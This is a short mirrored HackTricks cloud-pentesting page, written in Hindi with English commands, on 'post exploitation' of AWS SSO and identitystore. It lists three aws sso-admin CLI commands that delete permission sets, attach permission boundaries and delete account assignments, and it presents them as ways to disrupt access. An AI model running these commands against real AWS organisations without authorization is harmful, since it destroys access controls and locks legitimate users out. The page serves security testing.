mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-16 06:42:39 -08:00
1.1 KiB
1.1 KiB
AWS - SSO & identitystore Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
SSO & identitystore
अधिक जानकारी के लिए देखें:
{{#ref}} ../aws-services/aws-iam-enum.md {{#endref}}
sso:DeletePermissionSet | sso:PutPermissionsBoundaryToPermissionSet | sso:DeleteAccountAssignment
इन अनुमतियों का उपयोग अनुमतियों को बाधित करने के लिए किया जा सकता है:
aws sso-admin delete-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
aws sso-admin put-permissions-boundary-to-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --permissions-boundary-policy-arn <PolicyARN>
aws sso-admin delete-account-assignment --instance-arn <SSOInstanceARN> --target-id <TargetID> --target-type <TargetType> --permission-set-arn <PermissionSetARN> --principal-type <PrincipalType> --principal-id <PrincipalID>
{{#include ../../../banners/hacktricks-training.md}}